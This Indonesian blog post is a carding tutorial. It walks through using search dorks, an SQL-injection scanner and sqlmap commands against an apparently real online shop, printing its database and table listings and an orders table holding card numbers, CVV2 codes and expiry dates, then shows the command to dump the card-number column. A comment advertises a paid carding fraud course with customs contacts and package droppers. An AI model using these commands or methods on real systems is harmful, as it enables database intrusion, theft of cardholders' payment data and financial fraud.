Empat-Dua.blogspot.com

Knowledge,Fact,News,and Manymore
https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-prn1/t1/1016398_674764515919487_579007216_n.jpg https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-frc3/t1/1779147_674764739252798_1287507055_n.jpg
Browse » Home » » Tutorial Carding dengan Dork Backtrack

Tutorial Carding dengan Dork Backtrack


Kali ini saya akan mengepost tutorial Carding dengan Sqlmap,berhubungan saya tidak terlalu bisa dengan cara ini saya akan mengepost postingan dari web yg udah jago maen sqlmap










 Langsung aja eksekusi :D
Pertama kita siapkan tools" nya dahulu :

1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :
Pertama ,ambil dork lalu scan menggunakan sqli scanner :
Klik Open Untuk Melihat Gambar :
Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
Nah, web tersebut error saat kita inject ,


Klik Open Untuk Melihat Gambar :



Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs
Disini kita mendapatkan 3 database :


Klik Open Untuk Melihat Gambar :



[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :


Klik Open Untuk Melihat Gambar :




Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini : 

Klik Open Untuk Melihat Gambar :


Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+
Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .

Jika kurang jelas bisa download video nya disini


Semoga bermanfaat :)
 
Share :

2 komentar:

  1. Unknown26 Agustus 2017 pukul 15.08

    gan ini lagunya judulnya apa?? :D

    BalasHapus
  2. Kang Carding3 Mei 2018 pukul 22.06

    pembelajaran paketan 3 VIP
    >> include all off paketan 1 and 2
    >> dapat methode order barang, gpc, tiket pesawat, booking hotel
    >> special vpn vip 72
    >> dapat contact wa kenalan orang bea cukai (supaya barang enak ngelolosinnya)
    >> dapat dropper luar negeri recomended fast respon
    >> dapat seller amazon, ali express, shopify terbaik yang bisa di carding alias tipu"
    >> masuk grup line carder kami agar dapat lebih mudah sharing pengalaman, tips dan trik
    price: 1k++

    BalasHapus

Langganan: Posting Komentar (Atom)